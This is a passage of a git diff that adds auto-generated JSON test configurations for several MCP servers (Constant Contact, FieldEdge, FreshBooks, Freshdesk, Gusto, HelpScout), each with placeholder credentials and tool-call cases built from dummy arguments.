"list_campaigns": { + "args": { + "limit": 50, + "before_date": "test_value", + "after_date": "test_value", + "cursor": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_campaigns:empty-before_date": { + "args": { + "limit": 50, + "before_date": "", + "after_date": "test_value", + "cursor": "test_value" + }, + "expect": "exists" + }, + "list_campaigns:empty-after_date": { + "args": { + "limit": 50, + "before_date": "test_value", + "after_date": "", + "cursor": "test_value" + }, + "expect": "exists" + }, + "list_campaigns:empty-cursor": { + "args": { + "limit": 50, + "before_date": "test_value", + "after_date": "test_value", + "cursor": "" + }, + "expect": "exists" + }, + "create_campaign": { + "args": { + "name": "Test Name", + "subject": "test_value", + "from_name": "Test Name", + "from_email": "test@example.com", + "reply_to_email": "test@example.com", + "html_content": "Sample content for testing", + "text_content": "Sample content for testing", + "format_type": 1, + "physical_address_in_footer": {} + }, + "expect": "content && content.length > 0" + }, + "create_campaign:empty-reply_to_email": { + "args": { + "name": "Test Name", + "subject": "test_value", + "from_name": "Test Name", + "from_email": "test@example.com", + "reply_to_email": "", + "html_content": "Sample content for testing", + "text_content": "Sample content for testing", + "format_type": 1, + "physical_address_in_footer": {} + }, + "expect": "exists" + }, + "create_campaign:empty-html_content": { + "args": { + "name": "Test Name", + "subject": "test_value", + "from_name": "Test Name", + "from_email": "test@example.com", + "reply_to_email": "test@example.com", + "html_content": "", + "text_content": "Sample content for testing", + "format_type": 1, + "physical_address_in_footer": {} + }, + "expect": "exists" + }, + "create_campaign:empty-text_content": { + "args": { + "name": "Test Name", + "subject": "test_value", + "from_name": "Test Name", + "from_email": 
"test@example.com", + "reply_to_email": "test@example.com", + "html_content": "Sample content for testing", + "text_content": "", + "format_type": 1, + "physical_address_in_footer": {} + }, + "expect": "exists" + }, + "list_lists": { + "args": { + "limit": 50, + "include_count": true, + "include_membership_count": "all", + "cursor": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_lists:empty-include_membership_count": { + "args": { + "limit": 50, + "include_count": true, + "include_membership_count": "", + "cursor": "test_value" + }, + "expect": "exists" + }, + "list_lists:empty-cursor": { + "args": { + "limit": 50, + "include_count": true, + "include_membership_count": "all", + "cursor": "" + }, + "expect": "exists" + }, + "add_to_list": { + "args": { + "list_id": "test-id-123", + "contact_ids": [] + }, + "expect": "content && content.length > 0" + }, + "get_campaign_stats": { + "args": { + "campaign_activity_id": "test-id-123" + }, + "expect": "content && content.length > 0" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/constant-contact.json b/factory-tools/test-configs/constant-contact.json new file mode 100644 index 0000000..5ae9af5 --- /dev/null +++ b/factory-tools/test-configs/constant-contact.json @@ -0,0 +1,11 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/constant-contact/dist/index.js" + ], + "env": { + "CONSTANT_CONTACT_ACCESS_TOKEN": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/fieldedge-tests.json b/factory-tools/test-configs/fieldedge-tests.json new file mode 100644 index 0000000..d388cee --- /dev/null +++ b/factory-tools/test-configs/fieldedge-tests.json @@ -0,0 +1,370 @@ +{ + "server": { + "command": "node", + "args": [ + 
"/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/fieldedge/dist/index.js" + ], + "env": { + "FIELDEDGE_API_KEY": "factory_discovery_dummy", + "FIELDEDGE_SUBSCRIPTION_KEY": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_work_orders": { + "args": { + "page": 50, + "pageSize": 50, + "status": "open", + "customerId": "test-id-123", + "technicianId": "test-id-123", + "startDate": "test_value", + "endDate": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_work_orders:empty-status": { + "args": { + "page": 50, + "pageSize": 50, + "status": "", + "customerId": "test-id-123", + "technicianId": "test-id-123", + "startDate": "test_value", + "endDate": "test_value" + }, + "expect": "exists" + }, + "list_work_orders:empty-customerId": { + "args": { + "page": 50, + "pageSize": 50, + "status": "open", + "customerId": "", + "technicianId": "test-id-123", + "startDate": "test_value", + "endDate": "test_value" + }, + "expect": "exists" + }, + "list_work_orders:empty-technicianId": { + "args": { + "page": 50, + "pageSize": 50, + "status": "open", + "customerId": "test-id-123", + "technicianId": "", + "startDate": "test_value", + "endDate": "test_value" + }, + "expect": "exists" + }, + "list_work_orders:empty-startDate": { + "args": { + "page": 50, + "pageSize": 50, + "status": "open", + "customerId": "test-id-123", + "technicianId": "test-id-123", + "startDate": "", + "endDate": "test_value" + }, + "expect": "exists" + }, + "list_work_orders:empty-endDate": { + "args": { + "page": 50, + "pageSize": 50, + "status": "open", + "customerId": "test-id-123", + "technicianId": "test-id-123", + "startDate": "test_value", + "endDate": "" + }, + "expect": "exists" + }, + "get_work_order": { + "args": { + "id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "create_work_order": { + "args": { + "customerId": "test-id-123", + "locationId": "test-id-123", + "description": "test_value", + "workType": "service", + 
"priority": "low", + "scheduledDate": "test_value", + "scheduledTime": "test_value", + "technicianId": "test-id-123", + "equipmentIds": [], + "notes": "test_value" + }, + "expect": "content && content.length > 0" + }, + "create_work_order:empty-locationId": { + "args": { + "customerId": "test-id-123", + "locationId": "", + "description": "test_value", + "workType": "service", + "priority": "low", + "scheduledDate": "test_value", + "scheduledTime": "test_value", + "technicianId": "test-id-123", + "equipmentIds": [], + "notes": "test_value" + }, + "expect": "exists" + }, + "create_work_order:empty-workType": { + "args": { + "customerId": "test-id-123", + "locationId": "test-id-123", + "description": "test_value", + "workType": "", + "priority": "low", + "scheduledDate": "test_value", + "scheduledTime": "test_value", + "technicianId": "test-id-123", + "equipmentIds": [], + "notes": "test_value" + }, + "expect": "exists" + }, + "create_work_order:empty-priority": { + "args": { + "customerId": "test-id-123", + "locationId": "test-id-123", + "description": "test_value", + "workType": "service", + "priority": "", + "scheduledDate": "test_value", + "scheduledTime": "test_value", + "technicianId": "test-id-123", + "equipmentIds": [], + "notes": "test_value" + }, + "expect": "exists" + }, + "create_work_order:empty-scheduledDate": { + "args": { + "customerId": "test-id-123", + "locationId": "test-id-123", + "description": "test_value", + "workType": "service", + "priority": "low", + "scheduledDate": "", + "scheduledTime": "test_value", + "technicianId": "test-id-123", + "equipmentIds": [], + "notes": "test_value" + }, + "expect": "exists" + }, + "create_work_order:empty-scheduledTime": { + "args": { + "customerId": "test-id-123", + "locationId": "test-id-123", + "description": "test_value", + "workType": "service", + "priority": "low", + "scheduledDate": "test_value", + "scheduledTime": "", + "technicianId": "test-id-123", + "equipmentIds": [], + "notes": "test_value" + }, + 
"expect": "exists" + }, + "create_work_order:empty-technicianId": { + "args": { + "customerId": "test-id-123", + "locationId": "test-id-123", + "description": "test_value", + "workType": "service", + "priority": "low", + "scheduledDate": "test_value", + "scheduledTime": "test_value", + "technicianId": "", + "equipmentIds": [], + "notes": "test_value" + }, + "expect": "exists" + }, + "create_work_order:empty-notes": { + "args": { + "customerId": "test-id-123", + "locationId": "test-id-123", + "description": "test_value", + "workType": "service", + "priority": "low", + "scheduledDate": "test_value", + "scheduledTime": "test_value", + "technicianId": "test-id-123", + "equipmentIds": [], + "notes": "" + }, + "expect": "exists" + }, + "list_customers": { + "args": { + "page": 50, + "pageSize": 50, + "search": "test query", + "sortBy": "test_value", + "sortOrder": "asc" + }, + "expect": "content && content.length > 0" + }, + "list_customers:empty-search": { + "args": { + "page": 50, + "pageSize": 50, + "search": "", + "sortBy": "test_value", + "sortOrder": "asc" + }, + "expect": "exists" + }, + "list_customers:empty-sortBy": { + "args": { + "page": 50, + "pageSize": 50, + "search": "test query", + "sortBy": "", + "sortOrder": "asc" + }, + "expect": "exists" + }, + "list_customers:empty-sortOrder": { + "args": { + "page": 50, + "pageSize": 50, + "search": "test query", + "sortBy": "test_value", + "sortOrder": "" + }, + "expect": "exists" + }, + "list_technicians": { + "args": { + "page": 50, + "pageSize": 50, + "active": true, + "departmentId": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "list_technicians:empty-departmentId": { + "args": { + "page": 50, + "pageSize": 50, + "active": true, + "departmentId": "" + }, + "expect": "exists" + }, + "list_invoices": { + "args": { + "page": 50, + "pageSize": 50, + "status": "draft", + "customerId": "test-id-123", + "startDate": "test_value", + "endDate": "test_value" + }, + "expect": "content && 
content.length > 0" + }, + "list_invoices:empty-status": { + "args": { + "page": 50, + "pageSize": 50, + "status": "", + "customerId": "test-id-123", + "startDate": "test_value", + "endDate": "test_value" + }, + "expect": "exists" + }, + "list_invoices:empty-customerId": { + "args": { + "page": 50, + "pageSize": 50, + "status": "draft", + "customerId": "", + "startDate": "test_value", + "endDate": "test_value" + }, + "expect": "exists" + }, + "list_invoices:empty-startDate": { + "args": { + "page": 50, + "pageSize": 50, + "status": "draft", + "customerId": "test-id-123", + "startDate": "", + "endDate": "test_value" + }, + "expect": "exists" + }, + "list_invoices:empty-endDate": { + "args": { + "page": 50, + "pageSize": 50, + "status": "draft", + "customerId": "test-id-123", + "startDate": "test_value", + "endDate": "" + }, + "expect": "exists" + }, + "list_equipment": { + "args": { + "page": 50, + "pageSize": 50, + "customerId": "test-id-123", + "locationId": "test-id-123", + "equipmentType": "hvac" + }, + "expect": "content && content.length > 0" + }, + "list_equipment:empty-customerId": { + "args": { + "page": 50, + "pageSize": 50, + "customerId": "", + "locationId": "test-id-123", + "equipmentType": "hvac" + }, + "expect": "exists" + }, + "list_equipment:empty-locationId": { + "args": { + "page": 50, + "pageSize": 50, + "customerId": "test-id-123", + "locationId": "", + "equipmentType": "hvac" + }, + "expect": "exists" + }, + "list_equipment:empty-equipmentType": { + "args": { + "page": 50, + "pageSize": 50, + "customerId": "test-id-123", + "locationId": "test-id-123", + "equipmentType": "" + }, + "expect": "exists" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/fieldedge.json b/factory-tools/test-configs/fieldedge.json new file mode 100644 index 0000000..41e3edb --- /dev/null +++ b/factory-tools/test-configs/fieldedge.json @@ -0,0 +1,12 @@ +{ + "server": { + "command": 
"node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/fieldedge/dist/index.js" + ], + "env": { + "FIELDEDGE_API_KEY": "factory_discovery_dummy", + "FIELDEDGE_SUBSCRIPTION_KEY": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/freshbooks-tests.json b/factory-tools/test-configs/freshbooks-tests.json new file mode 100644 index 0000000..c7cf30c --- /dev/null +++ b/factory-tools/test-configs/freshbooks-tests.json @@ -0,0 +1,358 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/freshbooks/dist/index.js" + ], + "env": { + "FRESHBOOKS_ACCESS_TOKEN": "factory_discovery_dummy", + "FRESHBOOKS_ACCOUNT_ID": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_invoices": { + "args": { + "page": 50, + "per_page": 50, + "status": "draft" + }, + "expect": "content && content.length > 0" + }, + "list_invoices:empty-status": { + "args": { + "page": 50, + "per_page": 50, + "status": "" + }, + "expect": "exists" + }, + "get_invoice": { + "args": { + "invoice_id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "create_invoice": { + "args": { + "customer_id": 50, + "create_date": "test_value", + "due_offset_days": 50, + "currency_code": "javascript", + "notes": "test_value", + "terms": "test_value", + "lines": [] + }, + "expect": "content && content.length > 0" + }, + "create_invoice:empty-currency_code": { + "args": { + "customer_id": 50, + "create_date": "test_value", + "due_offset_days": 50, + "currency_code": "", + "notes": "test_value", + "terms": "test_value", + "lines": [] + }, + "expect": "exists" + }, + "create_invoice:empty-notes": { + "args": { + "customer_id": 50, + "create_date": "test_value", + "due_offset_days": 50, + "currency_code": "javascript", + "notes": "", + "terms": "test_value", + "lines": [] + }, + "expect": "exists" + }, + "create_invoice:empty-terms": { + "args": { + 
"customer_id": 50, + "create_date": "test_value", + "due_offset_days": 50, + "currency_code": "javascript", + "notes": "test_value", + "terms": "", + "lines": [] + }, + "expect": "exists" + }, + "send_invoice": { + "args": { + "invoice_id": "test-id-123", + "email_recipients": [], + "email_subject": "test@example.com", + "email_body": "test@example.com" + }, + "expect": "content && content.length > 0" + }, + "send_invoice:empty-email_subject": { + "args": { + "invoice_id": "test-id-123", + "email_recipients": [], + "email_subject": "", + "email_body": "test@example.com" + }, + "expect": "exists" + }, + "send_invoice:empty-email_body": { + "args": { + "invoice_id": "test-id-123", + "email_recipients": [], + "email_subject": "test@example.com", + "email_body": "" + }, + "expect": "exists" + }, + "list_clients": { + "args": { + "page": 50, + "per_page": 50 + }, + "expect": "content && content.length > 0" + }, + "create_client": { + "args": { + "email": "test@example.com", + "fname": "Test Name", + "lname": "Test Name", + "organization": "test_value", + "p_street": "test_value", + "p_city": "test_value", + "p_province": "test_value", + "p_code": "javascript", + "p_country": "test_value", + "currency_code": "javascript", + "bus_phone": "test_value", + "note": "test_value" + }, + "expect": "content && content.length > 0" + }, + "create_client:empty-email": { + "args": { + "email": "", + "fname": "Test Name", + "lname": "Test Name", + "organization": "test_value", + "p_street": "test_value", + "p_city": "test_value", + "p_province": "test_value", + "p_code": "javascript", + "p_country": "test_value", + "currency_code": "javascript", + "bus_phone": "test_value", + "note": "test_value" + }, + "expect": "exists" + }, + "create_client:empty-fname": { + "args": { + "email": "test@example.com", + "fname": "", + "lname": "Test Name", + "organization": "test_value", + "p_street": "test_value", + "p_city": "test_value", + "p_province": "test_value", + "p_code": "javascript", + 
"p_country": "test_value", + "currency_code": "javascript", + "bus_phone": "test_value", + "note": "test_value" + }, + "expect": "exists" + }, + "create_client:empty-lname": { + "args": { + "email": "test@example.com", + "fname": "Test Name", + "lname": "", + "organization": "test_value", + "p_street": "test_value", + "p_city": "test_value", + "p_province": "test_value", + "p_code": "javascript", + "p_country": "test_value", + "currency_code": "javascript", + "bus_phone": "test_value", + "note": "test_value" + }, + "expect": "exists" + }, + "create_client:empty-organization": { + "args": { + "email": "test@example.com", + "fname": "Test Name", + "lname": "Test Name", + "organization": "", + "p_street": "test_value", + "p_city": "test_value", + "p_province": "test_value", + "p_code": "javascript", + "p_country": "test_value", + "currency_code": "javascript", + "bus_phone": "test_value", + "note": "test_value" + }, + "expect": "exists" + }, + "create_client:empty-p_street": { + "args": { + "email": "test@example.com", + "fname": "Test Name", + "lname": "Test Name", + "organization": "test_value", + "p_street": "", + "p_city": "test_value", + "p_province": "test_value", + "p_code": "javascript", + "p_country": "test_value", + "currency_code": "javascript", + "bus_phone": "test_value", + "note": "test_value" + }, + "expect": "exists" + }, + "create_client:empty-p_city": { + "args": { + "email": "test@example.com", + "fname": "Test Name", + "lname": "Test Name", + "organization": "test_value", + "p_street": "test_value", + "p_city": "", + "p_province": "test_value", + "p_code": "javascript", + "p_country": "test_value", + "currency_code": "javascript", + "bus_phone": "test_value", + "note": "test_value" + }, + "expect": "exists" + }, + "create_client:empty-p_province": { + "args": { + "email": "test@example.com", + "fname": "Test Name", + "lname": "Test Name", + "organization": "test_value", + "p_street": "test_value", + "p_city": "test_value", + "p_province": "", + 
"p_code": "javascript", + "p_country": "test_value", + "currency_code": "javascript", + "bus_phone": "test_value", + "note": "test_value" + }, + "expect": "exists" + }, + "create_client:empty-p_code": { + "args": { + "email": "test@example.com", + "fname": "Test Name", + "lname": "Test Name", + "organization": "test_value", + "p_street": "test_value", + "p_city": "test_value", + "p_province": "test_value", + "p_code": "", + "p_country": "test_value", + "currency_code": "javascript", + "bus_phone": "test_value", + "note": "test_value" + }, + "expect": "exists" + }, + "create_client:empty-p_country": { + "args": { + "email": "test@example.com", + "fname": "Test Name", + "lname": "Test Name", + "organization": "test_value", + "p_street": "test_value", + "p_city": "test_value", + "p_province": "test_value", + "p_code": "javascript", + "p_country": "", + "currency_code": "javascript", + "bus_phone": "test_value", + "note": "test_value" + }, + "expect": "exists" + }, + "create_client:empty-currency_code": { + "args": { + "email": "test@example.com", + "fname": "Test Name", + "lname": "Test Name", + "organization": "test_value", + "p_street": "test_value", + "p_city": "test_value", + "p_province": "test_value", + "p_code": "javascript", + "p_country": "test_value", + "currency_code": "", + "bus_phone": "test_value", + "note": "test_value" + }, + "expect": "exists" + }, + "create_client:empty-bus_phone": { + "args": { + "email": "test@example.com", + "fname": "Test Name", + "lname": "Test Name", + "organization": "test_value", + "p_street": "test_value", + "p_city": "test_value", + "p_province": "test_value", + "p_code": "javascript", + "p_country": "test_value", + "currency_code": "javascript", + "bus_phone": "", + "note": "test_value" + }, + "expect": "exists" + }, + "create_client:empty-note": { + "args": { + "email": "test@example.com", + "fname": "Test Name", + "lname": "Test Name", + "organization": "test_value", + "p_street": "test_value", + "p_city": "test_value", 
+ "p_province": "test_value", + "p_code": "javascript", + "p_country": "test_value", + "currency_code": "javascript", + "bus_phone": "test_value", + "note": "" + }, + "expect": "exists" + }, + "list_expenses": { + "args": { + "page": 50, + "per_page": 50 + }, + "expect": "content && content.length > 0" + }, + "list_payments": { + "args": { + "page": 50, + "per_page": 50 + }, + "expect": "content && content.length > 0" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/freshbooks.json b/factory-tools/test-configs/freshbooks.json new file mode 100644 index 0000000..539f3de --- /dev/null +++ b/factory-tools/test-configs/freshbooks.json @@ -0,0 +1,12 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/freshbooks/dist/index.js" + ], + "env": { + "FRESHBOOKS_ACCESS_TOKEN": "factory_discovery_dummy", + "FRESHBOOKS_ACCOUNT_ID": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/freshdesk-tests.json b/factory-tools/test-configs/freshdesk-tests.json new file mode 100644 index 0000000..6e142e7 --- /dev/null +++ b/factory-tools/test-configs/freshdesk-tests.json @@ -0,0 +1,315 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/freshdesk/dist/index.js" + ], + "env": { + "FRESHDESK_API_KEY": "factory_discovery_dummy", + "FRESHDESK_DOMAIN": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_tickets": { + "args": { + "filter": "new_and_my_open", + "page": 50, + "per_page": 50, + "order_by": "test_value", + "order_type": "asc" + }, + "expect": "content && content.length > 0" + }, + "list_tickets:empty-filter": { + "args": { + "filter": "", + "page": 50, + "per_page": 50, + "order_by": "test_value", + "order_type": "asc" + }, + "expect": "exists" + }, + "list_tickets:empty-order_by": { + "args": 
{ + "filter": "new_and_my_open", + "page": 50, + "per_page": 50, + "order_by": "", + "order_type": "asc" + }, + "expect": "exists" + }, + "list_tickets:empty-order_type": { + "args": { + "filter": "new_and_my_open", + "page": 50, + "per_page": 50, + "order_by": "test_value", + "order_type": "" + }, + "expect": "exists" + }, + "get_ticket": { + "args": { + "id": 50, + "include": "test_value" + }, + "expect": "content && content.length > 0" + }, + "get_ticket:empty-include": { + "args": { + "id": 50, + "include": "" + }, + "expect": "exists" + }, + "create_ticket": { + "args": { + "subject": "test_value", + "description": "test_value", + "email": "test@example.com", + "requester_id": 50, + "priority": 1, + "status": 2, + "type": "test_value", + "source": 50, + "group_id": 50, + "responder_id": 50, + "tags": [], + "custom_fields": {} + }, + "expect": "content && content.length > 0" + }, + "create_ticket:empty-email": { + "args": { + "subject": "test_value", + "description": "test_value", + "email": "", + "requester_id": 50, + "priority": 1, + "status": 2, + "type": "test_value", + "source": 50, + "group_id": 50, + "responder_id": 50, + "tags": [], + "custom_fields": {} + }, + "expect": "exists" + }, + "create_ticket:empty-type": { + "args": { + "subject": "test_value", + "description": "test_value", + "email": "test@example.com", + "requester_id": 50, + "priority": 1, + "status": 2, + "type": "", + "source": 50, + "group_id": 50, + "responder_id": 50, + "tags": [], + "custom_fields": {} + }, + "expect": "exists" + }, + "update_ticket": { + "args": { + "id": 50, + "subject": "test_value", + "description": "test_value", + "priority": 50, + "status": 50, + "type": "test_value", + "group_id": 50, + "responder_id": 50, + "tags": [], + "custom_fields": {} + }, + "expect": "content && content.length > 0" + }, + "update_ticket:empty-subject": { + "args": { + "id": 50, + "subject": "", + "description": "test_value", + "priority": 50, + "status": 50, + "type": "test_value", + 
"group_id": 50, + "responder_id": 50, + "tags": [], + "custom_fields": {} + }, + "expect": "exists" + }, + "update_ticket:empty-description": { + "args": { + "id": 50, + "subject": "test_value", + "description": "", + "priority": 50, + "status": 50, + "type": "test_value", + "group_id": 50, + "responder_id": 50, + "tags": [], + "custom_fields": {} + }, + "expect": "exists" + }, + "update_ticket:empty-type": { + "args": { + "id": 50, + "subject": "test_value", + "description": "test_value", + "priority": 50, + "status": 50, + "type": "", + "group_id": 50, + "responder_id": 50, + "tags": [], + "custom_fields": {} + }, + "expect": "exists" + }, + "reply_ticket": { + "args": { + "id": 50, + "body": "test_value", + "from_email": "test@example.com", + "user_id": 50, + "cc_emails": [], + "bcc_emails": [], + "private": true + }, + "expect": "content && content.length > 0" + }, + "reply_ticket:empty-from_email": { + "args": { + "id": 50, + "body": "test_value", + "from_email": "", + "user_id": 50, + "cc_emails": [], + "bcc_emails": [], + "private": true + }, + "expect": "exists" + }, + "list_contacts": { + "args": { + "email": "test@example.com", + "phone": "test_value", + "mobile": "test_value", + "company_id": 50, + "state": "blocked", + "page": 50, + "per_page": 50 + }, + "expect": "content && content.length > 0" + }, + "list_contacts:empty-email": { + "args": { + "email": "", + "phone": "test_value", + "mobile": "test_value", + "company_id": 50, + "state": "blocked", + "page": 50, + "per_page": 50 + }, + "expect": "exists" + }, + "list_contacts:empty-phone": { + "args": { + "email": "test@example.com", + "phone": "", + "mobile": "test_value", + "company_id": 50, + "state": "blocked", + "page": 50, + "per_page": 50 + }, + "expect": "exists" + }, + "list_contacts:empty-mobile": { + "args": { + "email": "test@example.com", + "phone": "test_value", + "mobile": "", + "company_id": 50, + "state": "blocked", + "page": 50, + "per_page": 50 + }, + "expect": "exists" + }, + 
"list_contacts:empty-state": { + "args": { + "email": "test@example.com", + "phone": "test_value", + "mobile": "test_value", + "company_id": 50, + "state": "", + "page": 50, + "per_page": 50 + }, + "expect": "exists" + }, + "list_agents": { + "args": { + "email": "test@example.com", + "phone": "test_value", + "state": "fulltime", + "page": 50, + "per_page": 50 + }, + "expect": "content && content.length > 0" + }, + "list_agents:empty-email": { + "args": { + "email": "", + "phone": "test_value", + "state": "fulltime", + "page": 50, + "per_page": 50 + }, + "expect": "exists" + }, + "list_agents:empty-phone": { + "args": { + "email": "test@example.com", + "phone": "", + "state": "fulltime", + "page": 50, + "per_page": 50 + }, + "expect": "exists" + }, + "list_agents:empty-state": { + "args": { + "email": "test@example.com", + "phone": "test_value", + "state": "", + "page": 50, + "per_page": 50 + }, + "expect": "exists" + }, + "search_tickets": { + "args": { + "query": "test query", + "page": 50 + }, + "expect": "content && content.length > 0" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/freshdesk.json b/factory-tools/test-configs/freshdesk.json new file mode 100644 index 0000000..76b7db1 --- /dev/null +++ b/factory-tools/test-configs/freshdesk.json @@ -0,0 +1,12 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/freshdesk/dist/index.js" + ], + "env": { + "FRESHDESK_API_KEY": "factory_discovery_dummy", + "FRESHDESK_DOMAIN": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/gusto-tests.json b/factory-tools/test-configs/gusto-tests.json new file mode 100644 index 0000000..0bb19ea --- /dev/null +++ b/factory-tools/test-configs/gusto-tests.json @@ -0,0 +1,86 @@ +{ + "server": { + "command": "node", + "args": [ + 
"/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/gusto/dist/index.js" + ], + "env": { + "GUSTO_ACCESS_TOKEN": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_employees": { + "args": { + "company_id": "test-id-123", + "page": 50, + "per": 50 + }, + "expect": "content && content.length > 0" + }, + "get_employee": { + "args": { + "employee_id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "list_payrolls": { + "args": { + "company_id": "test-id-123", + "processed": true, + "start_date": "test_value", + "end_date": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_payrolls:empty-start_date": { + "args": { + "company_id": "test-id-123", + "processed": true, + "start_date": "", + "end_date": "test_value" + }, + "expect": "exists" + }, + "list_payrolls:empty-end_date": { + "args": { + "company_id": "test-id-123", + "processed": true, + "start_date": "test_value", + "end_date": "" + }, + "expect": "exists" + }, + "get_payroll": { + "args": { + "company_id": "test-id-123", + "payroll_id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "list_contractors": { + "args": { + "company_id": "test-id-123", + "page": 50, + "per": 50 + }, + "expect": "content && content.length > 0" + }, + "get_company": { + "args": { + "company_id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "list_benefits": { + "args": { + "company_id": "test-id-123" + }, + "expect": "content && content.length > 0" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/gusto.json b/factory-tools/test-configs/gusto.json new file mode 100644 index 0000000..e7c5837 --- /dev/null +++ b/factory-tools/test-configs/gusto.json @@ -0,0 +1,11 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/gusto/dist/index.js" + ], + "env": { + 
"GUSTO_ACCESS_TOKEN": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/helpscout-tests.json b/factory-tools/test-configs/helpscout-tests.json new file mode 100644 index 0000000..e2daf75 --- /dev/null +++ b/factory-tools/test-configs/helpscout-tests.json @@ -0,0 +1,287 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/helpscout/dist/index.js" + ], + "env": { + "HELPSCOUT_ACCESS_TOKEN": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_conversations": { + "args": { + "mailbox": 50, + "status": "active", + "tag": "test_value", + "assigned_to": 50, + "folder": 50, + "page": 50, + "sortField": "test_value", + "sortOrder": "asc" + }, + "expect": "content && content.length > 0" + }, + "list_conversations:empty-status": { + "args": { + "mailbox": 50, + "status": "", + "tag": "test_value", + "assigned_to": 50, + "folder": 50, + "page": 50, + "sortField": "test_value", + "sortOrder": "asc" + }, + "expect": "exists" + }, + "list_conversations:empty-tag": { + "args": { + "mailbox": 50, + "status": "active", + "tag": "", + "assigned_to": 50, + "folder": 50, + "page": 50, + "sortField": "test_value", + "sortOrder": "asc" + }, + "expect": "exists" + }, + "list_conversations:empty-sortField": { + "args": { + "mailbox": 50, + "status": "active", + "tag": "test_value", + "assigned_to": 50, + "folder": 50, + "page": 50, + "sortField": "", + "sortOrder": "asc" + }, + "expect": "exists" + }, + "list_conversations:empty-sortOrder": { + "args": { + "mailbox": 50, + "status": "active", + "tag": "test_value", + "assigned_to": 50, + "folder": 50, + "page": 50, + "sortField": "test_value", + "sortOrder": "" + }, + "expect": "exists" + }, + "get_conversation": { + "args": { + "id": 50 + }, + "expect": "content && content.length > 0" + }, + "create_conversation": { + "args": { + "mailboxId": 50, + "subject": "test_value", + "customer": {}, + "type": 
"email", + "status": "active", + "threads": [], + "tags": [], + "assignTo": 50 + }, + "expect": "content && content.length > 0" + }, + "create_conversation:empty-type": { + "args": { + "mailboxId": 50, + "subject": "test_value", + "customer": {}, + "type": "", + "status": "active", + "threads": [], + "tags": [], + "assignTo": 50 + }, + "expect": "exists" + }, + "create_conversation:empty-status": { + "args": { + "mailboxId": 50, + "subject": "test_value", + "customer": {}, + "type": "email", + "status": "", + "threads": [], + "tags": [], + "assignTo": 50 + }, + "expect": "exists" + }, + "reply_conversation": { + "args": { + "conversationId": 50, + "text": "Sample content for testing", + "user": 50, + "customer": {}, + "type": "reply", + "status": "active", + "draft": true, + "cc": [], + "bcc": [] + }, + "expect": "content && content.length > 0" + }, + "reply_conversation:empty-type": { + "args": { + "conversationId": 50, + "text": "Sample content for testing", + "user": 50, + "customer": {}, + "type": "", + "status": "active", + "draft": true, + "cc": [], + "bcc": [] + }, + "expect": "exists" + }, + "reply_conversation:empty-status": { + "args": { + "conversationId": 50, + "text": "Sample content for testing", + "user": 50, + "customer": {}, + "type": "reply", + "status": "", + "draft": true, + "cc": [], + "bcc": [] + }, + "expect": "exists" + }, + "list_customers": { + "args": { + "email": "test@example.com", + "firstName": "Test Name", + "lastName": "Test Name", + "query": "test query", + "page": 50, + "sortField": "test_value", + "sortOrder": "asc" + }, + "expect": "content && content.length > 0" + }, + "list_customers:empty-email": { + "args": { + "email": "", + "firstName": "Test Name", + "lastName": "Test Name", + "query": "test query", + "page": 50, + "sortField": "test_value", + "sortOrder": "asc" + }, + "expect": "exists" + }, + "list_customers:empty-firstName": { + "args": { + "email": "test@example.com", + "firstName": "", + "lastName": "Test Name", + 
